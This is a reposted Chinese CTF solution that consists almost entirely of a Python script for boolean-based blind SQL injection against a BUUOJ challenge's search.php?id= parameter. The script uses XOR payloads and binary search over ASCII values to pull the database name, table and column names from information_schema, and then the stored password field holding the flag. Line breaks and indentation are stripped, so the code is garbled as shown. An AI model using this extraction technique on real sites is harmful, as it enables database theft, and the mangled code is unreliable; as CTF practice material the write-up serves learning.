本文共 2297 字,大约阅读时间需要 7 分钟。
Clever! But not this table.
import requestsimport sysimport timedef get_DBlen(url): for i in range(1,10): db_url = url+"1^1^(length(database())=%d)#"%i r = requests.get(db_url) if "Click" in r.text: print("数据库名称的长度为:%d"%i) return idef get_DBname(url,length): DBname = "" length = length + 1 for i in range(1,length): Max = 122 Min = 41 Mid = (Max+Min)//2 while Min <= Max: # 爆表名 db_url = url+"1^1^(ascii(substr(database(),%d,1))>=%d)#"%(i,Mid) r = requests.get(db_url) if "Click" in r.text: Min=Mid+1 Mid=(Min+Max)//2 pass else: Max = Mid-1 Mid = (Min+Max)//2 pass pass DBname = DBname + chr(Mid) print(DBname) return DBnamedef get_TBname(url): name="" i = 0 while True: i = i+1 Max = 128 Min = 32 Mid = (Max+Min)//2 while Min <= Max: # 爆表名 # db_url = url+"1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>=%d)#"%(i,Mid) # 爆字段名 # db_url = url+"1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>=%d)#"%(i,Mid) # 获取flag db_url = url+"1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>=%d)"%(i,Mid) r = requests.get(db_url) if "Click" in r.text: Min=Mid+1 Mid=(Min+Max)//2 pass else: Max=Mid-1 Mid=(Min+Max)//2 pass pass name=name+chr(Mid) print(name) if Mid == 31: break time.sleep(0.5)if __name__=="__main__": url = "http://ff1a7c21-003a-43f1-85ec-8bbd9c55b53a.node3.buuoj.cn/search.php?id=" db_Len = get_DBlen(url) db_Name = get_DBname(url,db_Len) tb_name = get_TBname(url)
转载地址:http://rywmf.baihongyu.com/